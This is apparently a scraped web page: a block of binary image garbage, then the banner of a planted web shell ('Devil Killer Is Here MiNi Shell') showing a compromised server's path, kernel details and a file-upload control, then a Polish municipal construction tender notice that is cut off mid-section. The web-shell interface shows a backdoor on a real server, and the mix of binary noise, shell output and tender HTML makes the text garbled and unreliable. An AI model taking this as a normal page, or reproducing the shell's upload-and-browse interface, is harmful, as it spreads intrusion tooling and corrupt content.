JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210528/0006724802-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00067248 z dnia 2021-05-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dawnego budynku szkoły<br/>na potrzeby Centrum Opiekuńczo-Mieszkalnego<br/>wraz z budową zbiornika szczelnego do 10m3" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Drohiczyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659059</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">J.I.Kraszewskiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Drohiczyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">17-312</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">856565269</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">arek@drohiczyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.drohiczyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dawnego budynku szkoły<br/>na potrzeby Centrum Opiekuńczo-Mieszkalnego<br/>wraz z budową zbiornika szczelnego do 10m3" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ae4faf40-bf18-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00067248</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.um.drohiczyn.wrotapodlasia.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl,https://epuap.gov.pl/wps/portal dodatkowo komunikacja za pomocą poczty<br/>elektronicznej arek@drohiczyn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, zuwzględnieniem<br/>wyjątków określonych w ustawie pzp, odbywa się przy użyciu środków komunikacjielektronicznej.Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznejzdefiniowane w ustawie<br/>z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. 2.Wpostępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPuhttps://epuap.gov.pl/wps/portal dodatkowo<br/>komunikacja za pomocą poczty elektronicznej arek@drohiczyn.pl Złożenie oferty odbywa się za<br/>pomocą miniPortalu.3.Wykonawca zamierzający wziąć udział w postępowaniu oudzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający kontona ePUAP ma dostęp do<br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularzado komunikacji.<br/>4.Wymagania techniczne i organizacyjne wysyłania i odbieraniakorespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminiekorzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi orazRegulaminie ePUAP.5.Wykonawca<br/>przystępując do niniejszego postępowania o udzieleniezamówienia publicznego,akceptuje warunki<br/>korzystania z miniPortalu, określone w RegulaminieminiPortalu oraz zobowiązuje się korzystając z<br/>miniPortalu przestrzegać postanowień tego regulaminu.6. Maksymalny rozmiar plików przesyłanych za<br/>pośrednictwem dedykowanych formularzy do złożenia iwycofania oferty oraz do komunikacji wynosi<br/>150 MB. 7. Za datę przekazania oferty, oświadczenia, októrym mowa w art. 125ust. 1 ustawy Pzp,<br/>podmiotowych środków dowodowych lub cyfrowegoodwzorowania podmiotowych środków<br/>dowodowych oraz innych informacji, oświadczeń lubdokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na ePUAP. 8. Wpostępowaniu o udzielenie zamówienia<br/>korespondencja (inna niż oferta Wykonawcy i załączniki dooferty) odbywa się elektronicznie za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAPoraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji). Korespondencja przesłana zapomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej zniniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia (BZP). 9. Dokumenty elektroniczne, oświadczenia lub<br/>elektroniczne kopie dokumentów lub oświadczeń składanesą przez Wykonawcę za pośrednictwem<br/>Formularza do komunikacji jako załączniki. Sposóbsporządzenia dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów luboświadczeń musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów zdnia 30 grudnia2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagańtechnicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej wpostępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie. 10. Zamawiający nie przewidujesposobu komunikowania się z Wykonawcami w inny sposób<br/>niż przy użyciu środków komunikacjielektronicznej, wskazanych w SWZ .11. Postępowanie o<br/>udzielenie zamówienia prowadzi się w językupolskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.<br/>Urz. UE L 119 zdnia 4 maja2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: 1)administratorem<br/>Pani/a danychosobowychjest Burmistrz Drohiczyna, ul. J. I. Kraszewskiego 5, 17-312 Drohiczyn; tel. 85<br/>656 52 60;fax 85 655 7080, www.drohiczyn.pl um@drohiczyn.pl;2)administrator wyznaczył Inspektora<br/>DanychOsobowych, zktórym można się kontaktować pod adresem e-mail: iod@drohiczyn.pl 3)Pani/a<br/>daneosoboweprzetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>zprzedmiotowympostępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybieprzetargunieograniczonego; 4)odbiorcami Pani/a danych osobowych będą osoby lub<br/>podmioty,którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy<br/>pzp.5)Pani/adaneosobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od<br/>dniazakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata,okresprzechowywania obejmuje cały czas trwania umowy;6)obowiązek podania przez<br/>Panią/adanychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonymwprzepisanych ustawy pzp, związanym z udziałem w postępowaniu o<br/>udzieleniezamówieniapublicznego;7)w odniesieniu do Pani/a danych osobowych decyzje nie będą<br/>podejmowanew sposóbzautomatyzowany, stosownie do art. 22 RODO;8)posiada Pan/i:a)na podstawie<br/>art. 15RODO prawodostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy<br/>skorzystanie ztego prawawymagałoby po stronie administratora niewspółmiernie dużego wysiłku może<br/>zostaćPan/izobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania,wszczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznegolubkonkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania<br/>oudzieleniezamówienia);b)na podstawie art. 16 RODO prawo do sprostowania Pana/i<br/>danychosobowych(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania oudzieleniezamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawąPZP oraznie może naruszać integralności protokołu oraz jego załączników);c)na<br/>podstawie art. 18RODO prawożądania od administratora ograniczenia przetwarzania danych<br/>osobowych zzastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu orazprzypadków, o którychmowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie mazastosowania wodniesieniu do przechowywania, w celu zapewnienia korzystania<br/>ze środków ochronyprawnej lub wcelu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względyinteresupublicznego Unii Europejskiej lub państwa członkowskiego);d) prawo do<br/>wniesienia skargi doPrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danychosobowych Pana/idotyczących narusza przepisy RODO; 9) nie przysługuje Pani/u:a)w związku z art.17 ust. 3 lit. b, d lube RODO prawo do usunięcia danych osobowych;b)prawo<br/>do przenoszenia danych osobowych, októrym mowa w art. 20 RODO;c)na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobecprzetwarzaniadanych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowychjest art. 6 ust.1 lit. c RODO; 10) przysługuje Panu/i prawo wniesienia<br/>skargi do organu nadzorczego naniezgodne zRODO przetwarzanie Pani/Pana danych osobowych<br/>przez administratora. Organemwłaściwym dlaprzedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193Warszawa;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RG.271.9.2021.AŻ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa dawnego budynku szkoły na potrzeby Centrum Opiekuńczo-Mieszkalnego wraz z budową zbiornika szczelnego do 10m3. Szczegółowy opis oraz sposób realizacji zamówienia zawiera Opis Przedmiotu Zamówienia (OPZ), stanowiący odpowiednio: <br/> Załącznik nr 8.1 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45420000-7 - Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-04-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium Cena (C) – waga kryterium 60 %;Zamawiający ofercie o<br/>najniższej cenie spośród ofert ocenianych przyzna 60 punktów, a każdej następnej zostanie<br/>przyporządkowana liczba punktów proporcjonalnie mniejsza, według wzoru C = cena najniższa brutto/cena oferty ocenianej brutto x 100 pkt x 60% Kryterium „Okres<br/>gwarancji” (G) – waga kryterium40 %.Zamawiający w kryterium „Okres gwarancji” przyznawać będzie<br/>następujące punkty:- 3 latagwarancji – 0 pkt- 4 lata gwarancji - 20 pkt- 5 lat gwarancji – 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną inwestycję (zadanie) dotyczącą budowy, przebudowy, rozbudowy remontu, lub modernizacji budynku o wartości zadania co najmniej 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100) brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub<br/>wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – załącznik nr 4 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu robót budowlanych wykonanych nie wcześniej niż̇ w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,<br/>na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których<br/>mowa, są̨ referencje bądź́ inne dokumenty wystawione przez podmiot, na rzecz którego roboty<br/>budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać́ tych dokumentów – inne dokumenty. Wykaz należy sporządzić<br/>według wzoru stanowiącego załącznik nr 6 do SIWZ.;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku zaoferowania przez Wykonawcę rozwiązań równoważnych, zgodnie z art.<br/>101ust.6 ustawy Wykonawca może udowodnić w ofercie, w szczególności za<br/>pomocąprzedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy, że<br/>robotybudowlane, spełniają wymagania dotyczące wydajności lub funkcjonalności określone<br/>przezzamawiającego jeśli oferta jestzgodna z Polską Normą przenoszącą normę europejską,<br/>normamiinnych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszącymi<br/>normyeuropejskie, z europejską oceną techniczną, ze wspólną specyfikacją techniczną, z normą<br/>międzynarodową lub z systemem referencji technicznych ustanowionym przez europejski<br/>organnormalizacyjny, jeżeli te normy,oceny techniczne, specyfikacje i systemy referencji<br/>technicznychdotyczą wymagań dotyczących wydajności lub funkcjonalności określonych<br/>przezzamawiającego <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku zaoferowania przez Wykonawcę rozwiązań równoważnych, zgodnie z art.<br/>101ust.6 ustawy Wykonawca może udowodnić w ofercie, w szczególności za<br/>pomocąprzedmiotowych środków dowodowych, o których mowa w art. 104-107 ustawy, że<br/>robotybudowlane, spełniają wymagania dotyczące wydajności lub funkcjonalności określone<br/>przezzamawiającego jeśli oferta jestzgodna z Polską Normą przenoszącą normę europejską,<br/>normamiinnych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszącymi<br/>normyeuropejskie, z europejską oceną techniczną, ze wspólną specyfikacją techniczną, z normą<br/>międzynarodową lub z systemem referencji technicznych ustanowionym przez europejski<br/>organnormalizacyjny, jeżeli te normy,oceny techniczne, specyfikacje i systemy referencji<br/>technicznychdotyczą wymagań dotyczących wydajności lub funkcjonalności określonych<br/>przezzamawiającego <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mudo dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lubinny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie,będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia<br/>stanowizałącznik nr 5 do SWZ. Dokumenty z których wynika prawo do podpisania oferty,<br/>odpowiednie pełnomocnictwa. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takimprzypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albodo<br/>reprezentowania i podpisania umowy w sprawie zamówieniapublicznego.Dokument<br/>pełnomocnictwa, z treści którego będzie wynikało umocowanie doreprezentowania w<br/>postępowaniu o udzielenie zamówienia tych wykonawców, 